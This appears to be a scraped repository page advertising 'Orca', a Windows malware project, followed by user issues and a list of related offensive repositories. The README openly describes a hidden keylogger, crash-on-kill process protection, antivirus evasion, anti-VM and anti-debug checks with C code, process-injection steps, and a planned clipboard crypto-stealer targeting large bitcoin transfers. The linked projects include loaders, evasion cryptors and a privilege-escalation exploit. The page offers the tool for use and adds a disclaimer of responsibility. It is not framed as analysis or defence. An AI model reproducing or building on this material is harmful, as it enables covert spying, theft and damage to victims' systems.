Orca - Advanced Malware with multifeatures written in ASM/C/C++ , work on all windows versions ! (some features still under developing and not stable)

Overview

About Orca

  • Orca is an Advanced Malware with multifeatures written in ASM/C/C++

features

  • Run in Background (Hidden Mode)

  • Records keystrokes and saves them in a file .

Anti-Task manager kill using RtlSetProcessIsCritical

  • RtlSetProcessIsCritical used to protect the process from termination , any attempt to terminate it will cause the system to crash :(


  • Undectable (60+ Antivirus )


Detecting Virtual Environment Files and Processes

  • Code Snippets
  • the following Function will search for VMware Processes
void antiVm()
{
	const char* arr[] = { "vmtoolsd.exe","vmwaretray.exe","vmwareuser.exe" ,"VGAuthService.exe" ,"vmacthlp.exe" };
	for (int i = 0; i < strlen(*arr); i++)
	{
		if (GetPID(arr[i]))
			exit(EXIT_FAILURE);
	}
}
  • the following Function will search for VirtualBox Files
void antiVr() {
	if  (IsExist("C:\\windows\\System32\\vboxoglpackspu.dll"))exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxSF.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxVideo.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglpassthroughspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxdisp.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxhook.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxmrxnp.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxogl.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglcrutil.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxGuest.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglerrorspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglfeedbackspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxMouse.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglarrayspu.dll")) exit(EXIT_FAILURE);
}

Anti-Debug

  • the Malware will self close 'Silently' anytime detect a debugger or being debugged!! AntiDBG Library
  • The techniques that used to Detect debuggers :
  - Memory
  - CPU
  - Timing
  - Forced Exceptions

Process Injection

  • Process Injection It is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

Alt Text

TECHNICAL DETAILS

  • Open process with Access Rights
  • LPTHREAD_START_ROUTINE (its a pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and represents the starting address of the thread in the remote process. The function must exist in the remote process.)
  • VirtualAllocEx (used to allocate space from the target process virtual memory)
  • WriteProcessMemory (used to write the path of the shellcode into the allocated memory)
  • CreateRemoteThread (used to creates a thread in the virtual memory area of a process)

More Advanced features will be added soon like :

  • 🔥 Crypto Grabber( technique used to steal crypto by manipulating in clipboard ) i will add special update so you can target big holders ,eg the malware will work only when the victim is gonna transfer specific amount of bitcoin in specific wallet (like >400 bitcoin) ...

Disclaimer

  • I take no responsibility for Harmful using or any damage can make. Use it at your own risk.
Issues
  • compile

    compile

    hi there how could i compile this program. I don't have knowledge in c++ so I am not being able tocompile. I am using g++ orca.cp command to compile but gave an error.

    help wanted 
    opened by tinaayam 2
  • application error

    application error

    hi there, I downloaded the exe provided in thereleases. It gave various errors which I fixed by installing the required packages. but still it is giving an error when I am trying to launch orca. here is the error. Orca.exe - Application Error dialog The application was unable to start correctly (0xc000007b). Click OK to close the application. what are the possible ways to fix this error. I have tried launching using administrator rights but still the problem is same.

    help wanted 
    opened by tinaayam 1
Releases(Orca)
Owner
anas
anas
A recreation of the "Nobelium" malware based on Microsofts Malware analysis - Part 1: PDF2Pwn

Nobelium PdfDownloadRunAesMalware A recreation of the "Nobelium" malware based on Microsofts Malware analysis - Part 1: PDF2Pwn 1. Download PDF file f

boku 94 Jul 26, 2022
Small and dirty header-only library that supports user input with some more advanced features than in the standard lib.

dirty-term Small and dirty header-only library that supports user input with some more advanced features than in the standard lib. This small, lightwe

null 3 Apr 24, 2022
This is a prank windows malware, is only for fun, it's just for fun, it's not harmful

DBUSTER-PRO (C) 2021-2022 DioBrando This is a prank windows malware, just for fun, nothing harmful. I will teach you how to compile, and remove malwar

Dio brando 8 Apr 15, 2022
KaynLdr is a Reflective Loader written in C/ASM

KaynLdr About KaynLdr is a Reflective Loader written in C / ASM. It uses direct syscalls to allocate virtual memory as RW and changes it to RX. It era

C5pider 372 Aug 8, 2022
Cppbackport - A backport of C++11/14/17 features to earlier versions

This is a backport of the current C++ standard library to C++03/11/14. Obviously not everything can be backported, but quite a bit can. Quick Start Th

null 37 Sep 5, 2021
Vstat is a simple program I made for mostly myself on my Arch linux system, the "timezone" file may not work on all arch systems.

Vstat Vstat is a simple program I made for mostly myself on my Arch linux system. I made Vstat because the idea of having your system information disp

__Oblivion__ 1 Nov 11, 2021
Cobalt Strike BOF that uses a custom ASM HalosGate & HellsGate syscaller to return a list of processes

HalosGate Processlist Cobalt Strike BOF Cobalt Strike Beacon Object File (BOF) that uses a custom HalosGate & HellsGate syscaller, written in assembly

Bobby Cooke 50 May 12, 2022
CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still a zero day

WindowsMDM-LPE-0Day Works best on Windows 11 CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still

Exploit Blizzard 35 Aug 9, 2022
Faster neofetch alternative, written in C. Still improving :)

albafetch ~by alba4k albafetch is a simple, fast system fetching program. It prints many info about the system in way less than a second. I decided to

alba4k 14 Jul 22, 2022
Techniques based on named pipes for pool overflow exploitation targeting the most recent (and oldest) Windows versions

Table of Contents Table of Contents Introduction Named-Pipes Introduction Exploitation Spraying the non-paged pool Memory Disclosure/Arbitrary Read Co

null 131 Jul 2, 2022
Patch for Sierra's PowerChess to run on newer Windows Versions >9x

What is it? I recently stumbled upon the following thread: https://sourceforge.net/p/dxwnd/discussion/general/thread/98dd46dfc6/?page=0 Some people we

null 2 Mar 27, 2022
THIS REPO IS PART OF WHAT ORCA TOLD ME TO UPLOAD

artifact64 THIS REPO IS PART OF WHAT ORCA TOLD ME TO UPLOAD Generate x64 arch undetactable executables directly from cobalt strike . USAGE : compile u

null 68 Jul 16, 2022
THIS REPO IS PART OF WHAT ORCA TOLD ME TO UPLOAD

ACHLYSv2 How it works: First ACHLYS detects the environment of the machine its being in, by checking sandboxes and debuggers presents. second when the

null 27 Feb 1, 2022
THIS REPO IS PART OF WHAT ORCA TOLD ME TO UPLOAD

ACHLYSv1 How it works: First ACHLYS detects the environment of the machine its being in, by checking sandboxes and debuggers presents. second when the

null 16 Nov 29, 2021
THIS REPO IS PART OF WHAT ORCA TOLD ME TO UPLOAD

How Does 0x41 work: 1- checks the environment [detect sandboxes / debuggers / virtual machines] 2- download the [encrypted] shellcode file [.bin] if t

null 38 Jan 12, 2022
THIS REPO IS PART OF WHAT ORCA TOLD ME TO UPLOAD

WHALE : A AES CRYPTOR USAGE: All u have to do is to build "builder" project and run it according to ur arguments. the builder.exe will then build and

null 39 Jun 27, 2022
Original hVNC has been recoded to work with all version of windows above XP. Thanks to the original author for this wonderful tool.

hVNC - Recoded This is the recoded version of the hVNC found in TinyNuke trojan. Compiling Compile tested with Visual Studio 2017. No compile errors.

Snow Leopard 8 Jan 22, 2022
This repo does not contain any skins that work by themselves, but rather addons to already existing skins like CakeOS and Polybar

Rainmeter-addons ⚠ This repo does not contain any skins that work by themselves, but rather addons to already existing skins like CakeOS and Polybar E

null 4 Oct 17, 2021
A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses

Jektor Toolkit v1.0 This utility focuses on shellcode injection techniques to demonstrate methods that malware may use to execute shellcode on a victi

null 95 Aug 7, 2022